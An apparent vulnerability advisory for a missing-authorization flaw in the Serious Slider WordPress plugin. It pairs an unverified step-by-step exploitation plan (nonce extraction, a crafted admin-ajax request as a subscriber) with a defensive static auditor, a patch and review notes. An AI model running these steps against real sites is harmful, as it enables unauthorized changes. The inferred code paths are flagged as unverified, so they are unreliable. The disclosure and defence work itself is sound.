CVE-2026-25399

Serious Slider <= 1.2.7 - Missing Authorization

Severity: medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 1.3.0
Time to patch: 47 days

Description

The Serious Slider plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.2.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.2.7
Published: January 30, 2026
Last updated: March 17, 2026
Affected plugin: cryout-serious-slider

Source Code

WordPress.org SVN

Research Plan
Status: Unverified


This plan outlines the research and exploitation strategy for CVE-2026-25399 in the Serious Slider plugin. The vulnerability allows authenticated users (Subscriber+) to perform unauthorized actions due to a missing capability check in an AJAX handler.

1. Vulnerability Summary

The Serious Slider plugin (versions <= 1.2.7) registers several AJAX actions to manage slider content. In version 1.2.7, at least one administrative handler (likely related to slider duplication or reordering) validates a nonce but fails to verify that the requesting user has the necessary permissions (e.g., edit_posts or manage_options). This allows any authenticated user, including Subscribers, to trigger these administrative functions.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: serious_slider_duplicate (inferred, to be verified)
  • Parameters:
    • action: The AJAX action name.
    • nonce: A valid CSRF token.
    • id: The ID of the slider (post ID) to duplicate or modify.
  • Authentication: Subscriber-level credentials or higher.
  • Preconditions: A slider must already exist for the attacker to manipulate it.

3. Code Flow (Inferred)

  1. Registration: The plugin uses add_action( 'wp_ajax_serious_slider_duplicate', ... ) to register the handler. Note the absence of a nopriv version, confirming it requires authentication.
  2. Entry Point: The handler function (e.g., serious_slider_duplicate_callback) is invoked via admin-ajax.php.
  3. Insecure Verification:
    • The code likely calls check_ajax_referer( 'serious-slider-nonce', 'nonce' ).
    • Crucially, it misses a call to current_user_can( 'edit_posts' ) or similar.
  4. Sink: The function performs a database operation (e.g., wp_insert_post to copy the slider post and its metadata).

4. Nonce Acquisition Strategy

The plugin localizes admin parameters for its scripts. We need to determine whether these scripts are enqueued for all authenticated users in the WordPress dashboard, or only on the plugin's own admin screens.

  1. Identify Script Localization: Search for wp_localize_script in the plugin directory to find the object name and nonce key.
    • Search Command: grep -rn "wp_localize_script" .
    • Anticipated Variable: serious_slider_admin_params (inferred).
    • Anticipated Key: nonce.
  2. Verify Enqueueing: Check admin_enqueue_scripts hooks. If the plugin enqueues its admin script globally in the dashboard without capability checks, a Subscriber can access it.
  3. Extraction Method:
    1. Log in as a Subscriber.
    2. Navigate to /wp-admin/index.php.
    3. Use browser_eval to extract the nonce:
      browser_eval("window.serious_slider_admin_params?.nonce") (Verify the variable name after grep).

5. Exploitation Strategy

The goal is to duplicate an existing slider, which is an unauthorized administrative action.

Step 1: Discover Target Slider ID
Find an existing slider ID using WP-CLI:
wp post list --post_type=serious_slider --format=ids

Step 2: Authenticate as Subscriber
Ensure the execution agent is logged into the WordPress instance as a user with the subscriber role.

Step 3: Obtain Nonce
Navigate to the dashboard and extract the nonce using the browser_eval method described in Section 4.

Step 4: Execute Unauthorized Action
Send the malicious AJAX request:

  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-encoded):
    action=serious_slider_duplicate&id=[SLIDER_ID]&nonce=[EXTRACTED_NONCE]
  • Headers: Content-Type: application/x-www-form-urlencoded

6. Test Data Setup

Before exploitation, the environment must have:

  1. The Plugin: Serious Slider version 1.2.7 installed and active.
  2. A Target Slider: At least one slider created by an admin.
    • wp post create --post_type=serious_slider --post_title="Original Slider" --post_status=publish
  3. An Attacker Account: A user with the subscriber role.
    • wp user create attacker attacker@example.com --role=subscriber --user_pass=password

7. Expected Results

  • Response: The server should return a successful status (e.g., 200 OK with a JSON success message or the ID of the new slider).
  • Side Effect: A new post of type serious_slider should be created in the database, appearing as a copy of the original.

8. Verification Steps

After sending the HTTP request, verify the duplication via WP-CLI:

  1. Count Sliders: Check if the count of serious_slider posts has increased.
    wp post list --post_type=serious_slider
  2. Check Titles: Look for a slider with "Copy" or similar indicating a duplication.
    wp post list --post_type=serious_slider --field=post_title

9. Alternative Approaches

If serious_slider_duplicate is not the vulnerable action, search for other AJAX handlers using the following command:
grep -rn "add_action.*wp_ajax" .

Check the following common patterns for missing current_user_can:

  • serious_slider_sort: Reordering slides.
  • serious_slider_delete: Deleting slides/sliders.
  • serious-slider-save-settings: Modifying plugin configuration.

If the nonce is not available on the main dashboard, create a post with the [serious-slider] shortcode and visit that page as a Subscriber to see if the script (and nonce) is enqueued there.
wp post create --post_type=page --post_status=publish --post_content='[serious-slider id="TARGET_ID"]'

Research Findings
Static analysis — not yet PoC-verified

Summary

The Serious Slider plugin for WordPress is vulnerable to unauthorized administrative actions due to missing capability checks in its AJAX handlers in versions up to 1.2.7. This allows authenticated attackers with subscriber-level access to duplicate or potentially modify sliders by providing a valid nonce.

Vulnerable Code

// From Serious Slider <= 1.2.7

add_action( 'wp_ajax_serious_slider_duplicate', 'serious_slider_duplicate_ajax' );

function serious_slider_duplicate_ajax() {
    // Nonce is verified, but user permissions are not checked
    check_ajax_referer( 'serious-slider-nonce', 'nonce' );

    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    if ( $id ) {
        serious_slider_duplicate( $id );
    }
    wp_die();
}
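The audit step in section 9 of the research plan (list every wp_ajax registration, then check each callback for a current_user_can call) can be automated as a first-pass static check. The script below is an added example, not code from the advisory or from the Serious Slider plugin: it runs over a constructed PHP sample that mirrors the vulnerable handler above, plus a hypothetical hardened serious_slider_delete_ajax and a hypothetical nopriv handler for contrast. It classifies each handler by whether a nonce check and a capability check appear in its body; handlers registered with closures or array callbacks are reported as unresolved rather than silently skipped.

```python
"""Static audit for WordPress AJAX handlers that verify a nonce but never
check a capability (the bug class behind CVE-2026-25399).
Added example: not code from the advisory or the Serious Slider plugin."""
import re

# Constructed PHP sample. The first handler mirrors the pattern the advisory
# describes; the other two are hypothetical, written for contrast only.
SAMPLE_PHP = r"""
add_action( 'wp_ajax_serious_slider_duplicate', 'serious_slider_duplicate_ajax' );
add_action( 'wp_ajax_serious_slider_delete', 'serious_slider_delete_ajax' );
add_action( 'wp_ajax_nopriv_serious_slider_track', 'serious_slider_track_ajax' );

function serious_slider_duplicate_ajax() {
    check_ajax_referer( 'serious-slider-nonce', 'nonce' );
    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    if ( $id ) {
        serious_slider_duplicate( $id );
    }
    wp_die();
}

function serious_slider_delete_ajax() {
    check_ajax_referer( 'serious-slider-nonce', 'nonce' );
    $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
    if ( ! $id || ! current_user_can( 'edit_post', $id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    wp_delete_post( $id );
    wp_send_json_success();
}

function serious_slider_track_ajax() {
    update_option( 'serious_slider_views', 1 );
    wp_die();
}
"""

# add_action( 'wp_ajax_<action>' | 'wp_ajax_nopriv_<action>', <callback> )
# The callback group captures everything up to the next comma or ')'.
REGISTRATION_RE = re.compile(
    r"add_action\(\s*[\"'](wp_ajax(?:_nopriv)?_[A-Za-z0-9_\-]+)[\"']\s*,\s*([^,)]+)"
)
STRING_CALLBACK_RE = re.compile(r"^[\"']([A-Za-z0-9_\\]+)[\"']$")
NONCE_RE = re.compile(r"\b(?:check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(")
CAP_RE = re.compile(r"\b(?:current_user_can|user_can)\s*\(")


def find_function_body(src, name):
    """Return the text between the braces of `function name(...) {...}`, or
    None. Braces are counted naively, so a brace inside a string literal or
    comment would skew the count; adequate for a triage pass."""
    m = re.search(r"\bfunction\s+" + re.escape(name) + r"\s*\(", src)
    if not m:
        return None
    start = src.find("{", m.end())
    if start == -1:
        return None
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[start + 1:i]
    return None


def audit_ajax_handlers(src):
    """Classify every wp_ajax registration in `src`. Each finding carries the
    hook, the callback and one status:
      ok                            capability check present
      missing-capability-check      nonce checked, no capability check
      missing-nonce-and-capability  neither check present
      unauthenticated-endpoint      wp_ajax_nopriv_ hook, review by hand
      unresolved-callback           closure, array callback or unknown name
    A capability check inside a helper the handler calls is not followed,
    so 'missing-capability-check' means 'inspect', not 'confirmed'."""
    findings = []
    for hook, raw_callback in REGISTRATION_RE.findall(src):
        cb = STRING_CALLBACK_RE.match(raw_callback.strip())
        name = cb.group(1) if cb else raw_callback.strip()
        body = find_function_body(src, name) if cb else None
        if body is None:
            status = "unresolved-callback"
        elif hook.startswith("wp_ajax_nopriv_"):
            status = "unauthenticated-endpoint"
        elif CAP_RE.search(body):
            status = "ok"
        elif NONCE_RE.search(body):
            status = "missing-capability-check"
        else:
            status = "missing-nonce-and-capability"
        findings.append({"hook": hook, "callback": name, "status": status})
    return findings


if __name__ == "__main__":
    for f in audit_ajax_handlers(SAMPLE_PHP):
        print(f"{f['status']:30} {f['hook']} -> {f['callback']}")
```

Run it against a plugin directory by concatenating its PHP files into `src`; anything flagged missing-capability-check is a candidate for the pattern in this advisory and should be confirmed by reading the handler, since the checker does not follow calls into helpers and does not model nonce-only functions that are safe by design (purely read-only handlers, for example).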

Security Fix

--- serious-slider/includes/ajax-functions.php
+++ serious-slider/includes/ajax-functions.php
@@ -10,6 +10,9 @@
 function serious_slider_duplicate_ajax() {
     check_ajax_referer( 'serious-slider-nonce', 'nonce' );
+	if ( ! current_user_can( 'edit_posts' ) ) {
+		wp_die( __( 'You do not have sufficient permissions to access this page.' ) );
+	}
 
     $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0;
     if ( $id ) {
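Review bot: the three added lines are indented with tabs while the surrounding context lines use four spaces, so the file ends up with mixed indentation; match the existing style. On the check itself, `edit_posts` is a coarse capability that Contributors also hold, and it is tested before `$id` is parsed even though the handler acts on one specific post; reading `$id` first and then requiring `current_user_can( 'edit_post', $id )` ties the check to the object being duplicated. Finally, `wp_die()` with a translated HTML message is the page-load idiom; for an admin-ajax handler, `wp_send_json_error( ..., 403 )` gives the calling script a parseable failure and a correct status code.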

Exploit Outline

An authenticated attacker (Subscriber+) first obtains a valid security nonce, which the plugin localizes for its admin scripts via 'wp_localize_script' (typically within a 'serious_slider_admin_params' object exposed in the WordPress dashboard). The attacker then submits a POST request to '/wp-admin/admin-ajax.php' with the 'action' parameter set to 'serious_slider_duplicate', the 'nonce' parameter set to the extracted token, and an 'id' parameter representing the target slider. Because the plugin only validates the nonce and lacks a 'current_user_can()' check, it executes the duplication logic for the unauthorized user.
